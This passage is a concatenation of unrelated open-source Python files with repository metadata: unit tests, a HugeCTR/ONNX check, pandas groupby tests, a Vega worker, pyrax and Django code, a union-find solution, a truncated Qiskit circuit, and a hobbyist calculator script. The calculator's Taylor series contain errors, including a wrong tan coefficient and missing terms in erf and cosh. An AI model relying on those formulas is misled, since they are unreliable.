d86340a6767ed274ae880923b13b4c21609393f6 | 047fbc11cd389e56865034cf473807db8718d92e | /assignment_test.py | 46933b2148fcdc536230cfb6950f6b105b7d6bba | [] | no_license | SDSS-Computing-Studies/002b-basic-math-Sebastianmaudee | 5c07d14dd2f13a6de8674d08c36f614defd1d84a | ae9826096b03ba4cf0d45fa27ec4acf9449570b7 | refs/heads/master | 2023-08-28T23:20:37.346270 | 2021-10-21T21:16:41 | 2021-10-21T21:16:41 | 406,925,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | #! python3
import a1, a2, a3, a4, a5, a6
def test1():
assert a1.answer == 14
def test2():
assert a2.answer == 3
def test3():
assert a3.answer == 10
def test4():
assert a4.answer == 2.5
def test5():
assert a5.answer == 1
def test6():
assert a6.answer == 25
| [
"66690702+github-classroom[bot]@users.noreply.github.com"
] | 66690702+github-classroom[bot]@users.noreply.github.com |
ee9703daa5cc3632e67a2217d830eed7463293cf | 48fab33def7dfaed44dbf0a2c5c148798a10c4c8 | /test/onnx_converter_test/hugectr2onnx_wdl_test.py | 7577b6ee48494f469b7d97b2915f797fb76344de | [
"Apache-2.0"
] | permissive | js-ts/HugeCTR | 787fa22e8643cbfe7c6b9dac4414a70eb37f322c | 085b2e8ad2abaee5578e7bf43b8394d0b8473b58 | refs/heads/master | 2023-08-16T11:29:57.490236 | 2021-10-21T02:31:24 | 2021-10-21T02:31:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,851 | py | #
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hugectr
from hugectr.inference import InferenceParams, CreateInferenceSession
import hugectr2onnx
import onnxruntime as ort
from utils import read_samples_for_wdl, compare_array_approx
import numpy as np
def hugectr2onnx_wdl_test(batch_size, num_batches, data_source, data_file, graph_config, dense_model, sparse_models, onnx_model_path, model_name):
hugectr2onnx.converter.convert(onnx_model_path, graph_config, dense_model, True, sparse_models)
label, dense, wide_data, deep_data = read_samples_for_wdl(data_file, batch_size*num_batches, slot_num = 27)
sess = ort.InferenceSession(onnx_model_path)
res = sess.run(output_names=[sess.get_outputs()[0].name],
input_feed={sess.get_inputs()[0].name: dense, sess.get_inputs()[1].name: wide_data, sess.get_inputs()[2].name: deep_data})
res = res[0].reshape(batch_size*num_batches,)
inference_params = InferenceParams(model_name = model_name,
max_batchsize = batch_size,
hit_rate_threshold = 0.6,
dense_model_file = dense_model,
sparse_model_files = sparse_models,
device_id = 0,
use_gpu_embedding_cache = True,
cache_size_percentage = 0.6,
i64_input_key = False)
inference_session = CreateInferenceSession(graph_config, inference_params)
predictions = inference_session.predict(num_batches, data_source, hugectr.DataReaderType_t.Norm, hugectr.Check_t.Sum)
compare_array_approx(res, predictions, model_name, 1e-3, 1e-2)
if __name__ == "__main__":
hugectr2onnx_wdl_test(64, 100, "./wdl_data/file_list_test.txt",
"./wdl_data/val/sparse_embedding0.data",
"/onnx_converter/graph_files/wdl.json",
"/onnx_converter/hugectr_models/wdl_dense_2000.model",
["/onnx_converter/hugectr_models/wdl0_sparse_2000.model",
"/onnx_converter/hugectr_models/wdl1_sparse_2000.model"],
"/onnx_converter/onnx_models/wdl.onnx",
"wdl") | [
"[email protected]"
] | |
41d3c3423049d66be5d5a676da6f65fc11ccee96 | 3117852233ea6c2644e723587a7b28d6d6518d95 | /Calculator_Gamma.py | 56834b8c0142138f9ff1356056dec9729eb49cbb | [] | no_license | harishravi121/Pythoncodes | d70059a3b7785d668a4b03f3ec85b0777b33706f | 1d6d6ca0ed6348b6c5d07d27d24668fb567527ca | refs/heads/master | 2023-07-07T11:58:03.741814 | 2023-07-01T08:01:56 | 2023-07-01T08:01:56 | 211,642,477 | 3 | 0 | null | 2020-01-13T06:45:25 | 2019-09-29T10:00:32 | Python | UTF-8 | Python | false | false | 4,117 | py | #The ALU has digital circuits for sum, subtraction, multiplication and comparision.
#The challenge here would be to write the code for division, square root, trignometric and other fuctions
#The following python code just needs python install of 30 MB
x='25'; #2 digit number
y='14'; #2 digit number
#Doing representation of two digit product
product=int(x[1])*int(y[1])+10*(int(x[0])*int(y[1])+int(x[1])*int(y[0]))+int(x[0])*int(y[0])*100
#Doing representation of digit sum and subtraction
add=int(x[1])+int(y[1])+10*(int(x[0])+int(y[0]))
sub=int(x[1])-int(y[1])+10*(int(x[0])-int(y[0]))
#Showing output,
print('Product of ',x,' and' ,y,' ', product)
print('Sum of',x,' and' ,y,' ',add)
print('Subtraction ',x,' and' ,y,' ',sub)
#Dividing x a two digit number by z a single digit number
z='3'# Single digit number
ha=1;# While loop flag
j=0; # Increasing the quotient in the loop until the product exceeds the divisor
while ha:
r=int(x[1])+10*int(x[0])-j*int(z[0]);
if(r<int(z[0])):
ha=0; #Setting the while loop flag to 0 to come out of the loop
j=j+1; #incrementing the quotient until it divides
j=j-1; # Reducing the quotient as we counted one past
#Getting the decimal point of the quotient
ha=1;
h=0;
while ha:
r2=r*10-h*int(z[0]);
if(r2<int(z[0])):
ha=0;
h=h+1;
h=h-1;
print('division of ',x,' and' ,z,' ',j,'.',h)
#Finding square root by subtracting successively the contribution from most significant digit.
sq='314';
ha=1;
a=0;
while ha:
luv=int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a;
a=a+1;
if luv<0:
ha=0;
a=a-2;
ha=1;
b=0;
while ha:
luv2=int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a-(20*a+b)*b;
b=b+1;
if luv2<0:
ha=0;
b=b-2;
ha=1;
c=0;
while ha:
luv3=100*(int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a-(20*a+b)*b)-c*(200*a+20*b+c);
c=c+1;
if luv3<0:
ha=0;
c=c-2;
print('Square root of ',sq , ' ',10*a+b,'.',c)
#Maclaurin expansion of all trignometric and hyperbolic functions
n=100
def hfactorial(n):
s=1;
for j in range(1,n+1):
s=s*j
return s
def hsin(x):
return x-x*x*x/6+x*x*x*x*x/120-x*x*x*x*x*x*x/5040;
def hcos(x):
return 1-x*x/2+1/24*x*x*x*x-x*x*x*x*x*x/720;
def htan(x):
return x+x*x*x/3+2/15*x*x*x*x*x+17/315*x*x*x*x*x*x*x+62/2035*x*x*x*x*x*x*x*x*x;
def h2cos(x):
s=0.0;
for j in range(n):
s=s+(-1)**j/hfactorial(2*j)*(x**(2*j))
return s
def h2sin(x):
s=0.0;
for j in range(n):
s=s+(-1)**j/hfactorial(2*j+1)*(x**(2*j+1))
return s
def h2sinh(x):
s=0.0;
for j in range(n):
s=s+1/hfactorial(2*j+1)*(x**(2*j+1))
return s
def h2atanh(x):
s=0.0;
for j in range(1,n):
s=s+1/(2*j-1)*(x**(2*j-1))
return s
def h2atan(x):
s=0.0;
for j in range(1,n):
s=s+(-1.0)**(j+1)/(2*j-1)*(x**(2*j-1))
return s
def h2ln1px(x):
s=0.0;
for j in range(1,n):
s=s+(-1)**(j+1)/j*(x**(j))
return s
def h2erf(x):
s=0.0;
for j in range(1,n):
s=s+2/np.sqrt(np.pi)*(-1)**j/(2*j+1)/hfactorial(j)*(x**(2*j+1))
return s
def h2exp(x):
s=0.0;
for j in range(n):
s=s+1.0/hfactorial(j)*(x**(j))
return s
def h2acot(x):
s=0.0;
for j in range(1,n):
s=s+(-1)**j/(2*j+1)*(x**(2*j+1))
return np.pi/2-s
def h2cosh(x):
s=0.0;
for j in range(1,n):
s=s+1/hfactorial(2*j)*(x**(2*j))
return s
print('pi',h2atan(1)*4.0)
print('e',h2exp(1))
"""
import numpy as np
import matplotlib.pyplot as plt
def h2gamma(n):
if n==1:
return 1;
if n==0.5:
return 1;
else:
return (n-1)*h2gamma(n-1);
x=np.arange(0,0.5,0.1)
#plt.plot(x,h2sin(x),x,h2cos(x),x,h2exp(x),x,h2erf(x),x,h2cosh(x),x,h2acot(x),x,h2erf(x),x,h2ln1px(x),x,h2atan(x),x,h2atanh(x))
#plt.show()
"""
| [
"[email protected]"
] | |
caf7ec1a93c4ba7f19938d29664e3db866008a9a | 0add7953d3e3ce2df9e8265102be39b758579753 | /built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/vega/core/trainer/distributed_worker.py | 5d9fc4bf51e66b007308d25784eede866bf0e020 | [
"Apache-2.0",
"MIT"
] | permissive | Huawei-Ascend/modelzoo | ae161c0b4e581f8b62c77251e9204d958c4cf6c4 | df51ed9c1d6dbde1deef63f2a037a369f8554406 | refs/heads/master | 2023-04-08T08:17:40.058206 | 2020-12-07T08:04:57 | 2020-12-07T08:04:57 | 319,219,518 | 1 | 1 | Apache-2.0 | 2023-03-24T22:22:00 | 2020-12-07T06:01:32 | Python | UTF-8 | Python | false | false | 9,223 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Distributed worker for training and evaluating.
Distributed worker is the basic class of TrainWorker and EvaluatorWork,
it loads the pickle file into worker from master, and run the train_process
function of each distributed worker on local node, it also has the function
of timeout, killing the worker process which exceeds setting time.
"""
import os
import copy
import pickle
import subprocess
import logging
import traceback
import json
from vega.core.common.task_ops import TaskOps
from .utils import kill_proc_tree
from vega.core.common import UserConfig
from vega.core.common.class_factory import ClassFactory
from vega.search_space.networks import NetworkFactory
from vega.core.common.utils import switch_directory
from vega.core.common.general import General
from vega.core.common.config import obj2config
class DistributedWorker(TaskOps):
"""Class of Distributed Worker.
This is a distributed worker used to load worker's pickle file,
and run the process of training and evaluating.
:param args: arguments from user config file
:type args: dict or Config, default to None
"""
# original params
__worker_path__ = None
__worker_module__ = None
__worker_name__ = None
# id params
__worker_id__ = 0
__config__ = None
__general__ = None
def __init__(self, args=None):
"""Init DistributedWorker."""
super(DistributedWorker, self).__init__()
# privates
DistributedWorker.__worker_id__ = DistributedWorker.__worker_id__ + 1
self._worker_id = DistributedWorker.__worker_id__
# publics
self.rank = 0
self.world_size = 1
self.worker_addr = ""
self.worker_nccl_port = 16666
self.timeout = int(float(General.worker.timeout) * 60 * 60)
self.__env_config__ = (copy.deepcopy(UserConfig().data),
copy.deepcopy(ClassFactory.__configs__),
copy.deepcopy(ClassFactory.__registry__))
self.__network_config__ = copy.deepcopy(NetworkFactory.__network_registry__)
self.__general__ = obj2config(General)
self.__worker_device_folder__ = os.path.join(self.temp_path, '.worker_device')
if not os.path.exists(self.__worker_device_folder__):
os.makedirs(self.__worker_device_folder__, exist_ok=True)
return
@property
def worker_id(self):
"""Property: worker_id."""
return self._worker_id
@worker_id.setter
def worker_id(self, value):
"""Setter: set worker_id with value.
:param value: worker id
:type value: int
"""
self._worker_id = value
def call_in_gpu(self):
"""Call function based on GPU devices."""
env = os.environ.copy()
sub_pid_list = []
if 'CUDA_VISIBLE_DEVICES' in env:
try:
first_gpu_id = env['CUDA_VISIBLE_DEVICES'].split(",")[0]
env['VEGA_WORKER_PORT'] = '{}'.format(self.worker_nccl_port + int(first_gpu_id))
except Exception:
env['VEGA_WORKER_PORT'] = '{}'.format(self.worker_nccl_port)
if 'PYTHONPATH' in env:
env['PYTHONPATH'] = "{}:{}:{}".format(
env['PYTHONPATH'], self.__worker_path__, os.path.abspath(os.curdir))
elif self.__worker_id__ is not None and self.__worker_path__ is not None:
env['PYTHONPATH'] = "{}:{}".format(
self.__worker_path__, os.path.abspath(os.curdir))
sub_pid = self._subprocess(rank=0, world_size=self.world_size,
env=env, is_backend=False)
sub_pid_list.append(sub_pid)
return sub_pid_list
def call_in_npu(self):
"""Call function based on NPU devices."""
env = os.environ.copy()
sub_pid_list = []
npu_call_path = os.path.join(self.__worker_device_folder__, 'npu')
if not os.path.exists(npu_call_path):
os.makedirs(npu_call_path, exist_ok=True)
if 'PYTHONPATH' in env:
env['PYTHONPATH'] = "{}:{}:{}".format(
env['PYTHONPATH'], self.__worker_path__, os.path.abspath(os.curdir))
elif self.__worker_id__ is not None and self.__worker_path__ is not None:
env['PYTHONPATH'] = "{}:{}".format(
self.__worker_path__, os.path.abspath(os.curdir))
rank_file = env.get('RANK_TABLE_FILE')
with open(rank_file, 'r') as f:
rank_table_json = json.loads(f.read())
if self.__general__.get('dft', False):
env['RANK_SIZE'] = env['ORIGIN_RANK_SIZE']
env['RANK_TABLE_FILE'] = env['ORIGIN_RANK_TABLE_FILE']
else:
env['RANK_SIZE'] = '1'
env['DEVICE_ID'] = rank_table_json['server_list'][0]['device'][0]['device_id']
env['RANK_ID'] = env['DEVICE_ID']
# env['DEVICE_ID'] = rank_table_json['group_list'][0]['instance_list'][0]['devices'][0]['device_id']
env.pop('RANK_TABLE_FILE', None)
with switch_directory(os.path.join(npu_call_path, 'device%s' % env['DEVICE_ID'])):
sub_pid = self._subprocess(rank=0, world_size=1, env=env, is_backend=False)
sub_pid_list.append(sub_pid)
return sub_pid_list
def __call__(self, *args, **kwargs):
"""Call function of distributed worker.
To empty cuda memory, set environ,
and do the subprocess function.
:param *args: positional arguments
:type *args: tuple
:param ** kwargs: keyword argumnets
:type ** kwargs: dict
:return: 0
"""
# empty the cuda memory first.
# set Environment
sub_pid_list = []
if os.environ['DEVICE_CATEGORY'] == 'GPU':
sub_pid_list = self.call_in_gpu()
elif os.environ['DEVICE_CATEGORY'] == 'NPU':
sub_pid_list = self.call_in_npu()
# next we need to deal with the subprocess return status!!!
logging.info("DistributedWorker finished!")
for sub_pid in sub_pid_list:
kill_proc_tree(pid=sub_pid)
logging.info("DistributedWorker subprocess cleaned!")
return 0
def _subprocess(self, rank, world_size, env, is_backend=False):
"""Subprocess on each rank.
Load pickle file into worker class, and use subprocess to run the
train_process function.
:param rank: node rank
:type rank: int
:param world_size: number of total nodes
:type world_size: int
:param env: environ
:type env: dict
:param is_backend: backend or not
:type is_backend: bool
"""
worker_path = self.get_local_worker_path(self.__general__.step_name, self.worker_id)
worker_file = os.path.join(worker_path, 'worker_file_{0}_{1}.pickle'.format(self.worker_id, rank))
with open(worker_file, "wb") as f:
pickle.dump(self, f)
env['RANK'] = "{}".format(rank)
env['WORLD_SIZE'] = "{}".format(world_size)
cmd = "import pickle;f=open('{0}', 'rb');augment = pickle.load(f);".format(worker_file)
cmd = cmd + "from vega.core.common.user_config import UserConfig;"
cmd = cmd + "from vega.core.common.class_factory import ClassFactory;"
cmd = cmd + "from vega.search_space.networks import NetworkFactory;"
cmd = cmd + "user_config_data,ClassFactory.__configs__,ClassFactory.__registry__=augment.__env_config__;"
cmd = cmd + "NetworkFactory.__network_registry__=augment.__network_config__;"
cmd = cmd + "UserConfig().load(user_config_data);"
cmd = cmd + "from vega.core.common.loader import load_conf_from_desc;"
cmd = cmd + "from vega.core.pipeline.conf import PipeStepConfig;"
cmd = cmd + "load_conf_from_desc(PipeStepConfig, ClassFactory.__configs__);"
cmd = cmd + "from vega.core.common.general import General;"
cmd = cmd + "load_conf_from_desc(General, augment.__general__);"
if 'VEGA_INIT_ENV' in os.environ:
cmd = cmd + os.environ.copy()['VEGA_INIT_ENV']
cmd = cmd + "augment.train_process()"
if is_backend:
proc = subprocess.Popen(['python3', '-c', cmd], close_fds=True, env=env)
pid = proc.pid
else:
try:
proc = subprocess.Popen(['python3', '-c', cmd], env=env)
pid = proc.pid
proc.wait(timeout=self.timeout)
except Exception:
logging.warn("Timeout worker has been killed.")
logging.warn(traceback.print_exc())
return pid
def train_process(self):
"""Abstract base function for DistributedWorker to do the train process."""
raise NotImplementedError
| [
"[email protected]"
] | |
4ba94ad8d63b1aded9da71576d77fa7a6caafdec | 159d4ae61f4ca91d94e29e769697ff46d11ae4a4 | /venv/lib/python3.9/site-packages/pandas/tests/groupby/test_min_max.py | 25a57d24e04ef974fbd644249e8114cbe40588c9 | [
"MIT"
] | permissive | davidycliao/bisCrawler | 729db002afe10ae405306b9eed45b782e68eace8 | f42281f35b866b52e5860b6a062790ae8147a4a4 | refs/heads/main | 2023-05-24T00:41:50.224279 | 2023-01-22T23:17:51 | 2023-01-22T23:17:51 | 411,470,732 | 8 | 0 | MIT | 2023-02-09T16:28:24 | 2021-09-28T23:48:13 | Python | UTF-8 | Python | false | false | 5,733 | py | import numpy as np
import pytest
from pandas._libs.tslibs import iNaT
import pandas as pd
from pandas import (
DataFrame,
Index,
Series,
)
import pandas._testing as tm
def test_max_min_non_numeric():
# #2700
aa = DataFrame({"nn": [11, 11, 22, 22], "ii": [1, 2, 3, 4], "ss": 4 * ["mama"]})
result = aa.groupby("nn").max()
assert "ss" in result
result = aa.groupby("nn").max(numeric_only=False)
assert "ss" in result
result = aa.groupby("nn").min()
assert "ss" in result
result = aa.groupby("nn").min(numeric_only=False)
assert "ss" in result
def test_max_min_object_multiple_columns(using_array_manager):
# GH#41111 case where the aggregation is valid for some columns but not
# others; we split object blocks column-wise, consistent with
# DataFrame._reduce
df = DataFrame(
{
"A": [1, 1, 2, 2, 3],
"B": [1, "foo", 2, "bar", False],
"C": ["a", "b", "c", "d", "e"],
}
)
df._consolidate_inplace() # should already be consolidate, but double-check
if not using_array_manager:
assert len(df._mgr.blocks) == 2
gb = df.groupby("A")
with tm.assert_produces_warning(FutureWarning, match="Dropping invalid"):
result = gb.max(numeric_only=False)
# "max" is valid for column "C" but not for "B"
ei = Index([1, 2, 3], name="A")
expected = DataFrame({"C": ["b", "d", "e"]}, index=ei)
tm.assert_frame_equal(result, expected)
with tm.assert_produces_warning(FutureWarning, match="Dropping invalid"):
result = gb.min(numeric_only=False)
# "min" is valid for column "C" but not for "B"
ei = Index([1, 2, 3], name="A")
expected = DataFrame({"C": ["a", "c", "e"]}, index=ei)
tm.assert_frame_equal(result, expected)
def test_min_date_with_nans():
# GH26321
dates = pd.to_datetime(
Series(["2019-05-09", "2019-05-09", "2019-05-09"]), format="%Y-%m-%d"
).dt.date
df = DataFrame({"a": [np.nan, "1", np.nan], "b": [0, 1, 1], "c": dates})
result = df.groupby("b", as_index=False)["c"].min()["c"]
expected = pd.to_datetime(
Series(["2019-05-09", "2019-05-09"], name="c"), format="%Y-%m-%d"
).dt.date
tm.assert_series_equal(result, expected)
result = df.groupby("b")["c"].min()
expected.index.name = "b"
tm.assert_series_equal(result, expected)
def test_max_inat():
# GH#40767 dont interpret iNaT as NaN
ser = Series([1, iNaT])
gb = ser.groupby([1, 1])
result = gb.max(min_count=2)
expected = Series({1: 1}, dtype=np.int64)
tm.assert_series_equal(result, expected, check_exact=True)
result = gb.min(min_count=2)
expected = Series({1: iNaT}, dtype=np.int64)
tm.assert_series_equal(result, expected, check_exact=True)
# not enough entries -> gets masked to NaN
result = gb.min(min_count=3)
expected = Series({1: np.nan})
tm.assert_series_equal(result, expected, check_exact=True)
def test_max_inat_not_all_na():
# GH#40767 dont interpret iNaT as NaN
# make sure we dont round iNaT+1 to iNaT
ser = Series([1, iNaT, 2, iNaT + 1])
gb = ser.groupby([1, 2, 3, 3])
result = gb.min(min_count=2)
# Note: in converting to float64, the iNaT + 1 maps to iNaT, i.e. is lossy
expected = Series({1: np.nan, 2: np.nan, 3: iNaT + 1})
tm.assert_series_equal(result, expected, check_exact=True)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_column(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a")["b"], func)()
idx = pd.Int64Index([1, 2], name="a")
expected = Series(periods, index=idx, name="b")
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_frame(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a"), func)()
idx = pd.Int64Index([1, 2], name="a")
expected = DataFrame({"b": periods}, index=idx)
tm.assert_frame_equal(result, expected)
def test_aggregate_numeric_object_dtype():
# https://github.com/pandas-dev/pandas/issues/39329
# simplified case: multiple object columns where one is all-NaN
# -> gets split as the all-NaN is inferred as float
df = DataFrame(
{"key": ["A", "A", "B", "B"], "col1": list("abcd"), "col2": [np.nan] * 4},
).astype(object)
result = df.groupby("key").min()
expected = DataFrame(
{"key": ["A", "B"], "col1": ["a", "c"], "col2": [np.nan, np.nan]}
).set_index("key")
tm.assert_frame_equal(result, expected)
# same but with numbers
df = DataFrame(
{"key": ["A", "A", "B", "B"], "col1": list("abcd"), "col2": range(4)},
).astype(object)
result = df.groupby("key").min()
expected = DataFrame(
{"key": ["A", "B"], "col1": ["a", "c"], "col2": [0, 2]}
).set_index("key")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_aggregate_categorical_lost_index(func: str):
# GH: 28641 groupby drops index, when grouping over categorical column with min/max
ds = Series(["b"], dtype="category").cat.as_ordered()
df = DataFrame({"A": [1997], "B": ds})
result = df.groupby("A").agg({"B": func})
expected = DataFrame({"B": ["b"]}, index=Index([1997], name="A"))
# ordered categorical dtype should be preserved
expected["B"] = expected["B"].astype(ds.dtype)
tm.assert_frame_equal(result, expected)
| [
"[email protected]"
] | |
fd14a8d1149199664afe6d1f9f84b157b93b7cfb | bc1b9455826f2e07976c04b20515ac4a45eaf6b6 | /pyrax/resource.py | da570dcd342c43305fcae4a4a1f9c5ba3598bcd5 | [] | no_license | gondoi/pyrax | b3df411d4c1ed8d8e1e0151e9378f7400ff782fc | 4a917f55e706b650774a305a424ed456da773f02 | refs/heads/master | 2021-01-18T11:21:13.557056 | 2012-12-19T22:49:52 | 2012-12-19T22:49:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,352 | py | # Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack LLC.
# Copyright 2012 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base utilities to build API operation managers and objects on top of.
"""
import pyrax.utils as utils
class BaseResource(object):
"""
A resource represents a particular instance of an object (server, flavor,
etc). This is pretty much just a bag for attributes.
"""
HUMAN_ID = False
NAME_ATTR = "name"
def __init__(self, manager, info, loaded=False):
self._loaded = loaded
self.manager = manager
self._info = info
self._add_details(info)
@property
def human_id(self):
"""Subclasses may override this to provide a pretty ID which can be used
for bash completion.
"""
if self.NAME_ATTR in self.__dict__ and self.HUMAN_ID:
return utils.slugify(getattr(self, self.NAME_ATTR))
return None
def _add_details(self, info):
"""
Takes the dict returned by the API call and sets the
corresponding attributes on the object.
"""
for (key, val) in info.iteritems():
setattr(self, key, val)
def __getattr__(self, key):
"""
Many objects are lazy-loaded: only their most basic details
are initially returned. The first time any of the other attributes
are referenced, a GET is made to get the full details for the
object.
"""
if not self.loaded:
self.get()
# Attribute should be set; if not, it's not valid
try:
return self.__dict__[key]
except KeyError:
raise AttributeError("'%s' object has no attribute '%s'." % (self.__class__, key))
def __repr__(self):
reprkeys = sorted(key for key in self.__dict__.keys()
if (key[0] != "_") and (key != "manager"))
info = ", ".join("%s=%s" % (key, getattr(self, key)) for key in reprkeys)
return "<%s %s>" % (self.__class__.__name__, info)
def get(self):
"""Gets the details for the object."""
# set 'loaded' first ... so if we have to bail, we know we tried.
self.loaded = True
if not hasattr(self.manager, "get"):
return
new = self.manager.get(self)
if new:
self._add_details(new._info)
def delete(self):
"""Deletes the object."""
# set 'loaded' first ... so if we have to bail, we know we tried.
self.loaded = True
if not hasattr(self.manager, "delete"):
return
self.manager.delete(self)
def __eq__(self, other):
"""
Two resource objects that represent the same entity in the cloud
should be considered equal if they have the same ID. If they
don't have IDs, but their attribute info matches, they are equal.
"""
if not isinstance(other, self.__class__):
return False
if hasattr(self, "id") and hasattr(other, "id"):
return self.id == other.id
return self._info == other._info
def reload(self):
"""
Since resource objects are essentially snapshots of the entity they
represent at the time they are created, they do not update as the
entity updates. For example, the 'status' attribute can change, but
the instance's value for 'status' will not. This method will refresh
the instance with the current state of the underlying entity.
"""
new_obj = self.manager.get(self.id)
self._add_details(new_obj._info)
def _get_loaded(self):
return self._loaded
def _set_loaded(self, val):
self._loaded = val
loaded = property(_get_loaded, _set_loaded)
| [
"[email protected]"
] | |
705bb752a9258e3bc2c8ee9f16145cfd532bc894 | 60c0ca4ef3ad20bad04311473b2f4044f54739d2 | /store/api/migrations/0005_order_sold_at.py | af648d3a29d3d09976b8254d48088c4f4700c7c2 | [] | no_license | Jimiliani/rainforest | 361915024cc2a93a9bb8621372627b2d84176271 | b1bf65ee4441d1a4980a2e65ce2cfc629b9d6a7a | refs/heads/main | 2023-06-19T18:10:38.879924 | 2021-07-21T14:54:05 | 2021-07-21T14:54:05 | 387,679,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | # Generated by Django 3.1.5 on 2021-07-20 19:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20210720_2159'),
]
operations = [
migrations.AddField(
model_name='order',
name='sold_at',
field=models.DateField(null=True),
),
]
| [
"[email protected]"
] | |
c724c19fb17cb22589d49e60505ecf79ee04e7c5 | d1742451b25705fc128acc245524659628ab3e7d | /Data Structure & Algorithm/Disjoint Set Union/10685 - Nature.py | b0b9ec8421bcfe7e9e623074eb4e6f6e4a873ba0 | [] | no_license | Shovon588/Programming | ebab793a3c97aedddfcad5ea06e7e22f5c54a86e | e4922c9138998358eed09a1be7598f9b060c685f | refs/heads/master | 2022-12-23T18:29:10.141117 | 2020-10-04T17:29:32 | 2020-10-04T17:29:32 | 256,915,133 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | def makeset(n):
par[n] = n
def find(r):
if par[r]==r:
return r
par[r] = find(par[r])
return find(par[r])
def joint(a,b):
u = find(a)
v = find(b)
if u!=v:
par[u] = v
def generate_result(dic):
res = -1
for i in range(1,n+1):
temp = find(i)
if temp in dic:
dic[temp]+=1
res = max(res,dic[temp])
else:
dic[temp]=1
res = max(res,dic[temp])
return res
while(1):
n,m = map(int,input().split())
if n==0 and m==0:
break
par = [None]*(n+1)
animals = {}
for i in range(n):
animal = input()
animals[animal]=i+1
makeset(i+1)
for i in range(m):
first, second = map(str,input().split())
a = animals[first]
b = animals[second]
joint(a,b)
dic = {}
result = generate_result(dic)
print(result)
s = input()
| [
"[email protected]"
] | |
f386a2baff367c7b94051355314792f3ac231a3d | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p3BR/R2/benchmark/startQiskit_QC200.py | 254dea7ab62da21d4456472998e9b8a1d0c8d255 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,300 | py | # qubit number=3
# total number=37
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.cx(input_qubit[0],input_qubit[2]) # number=11
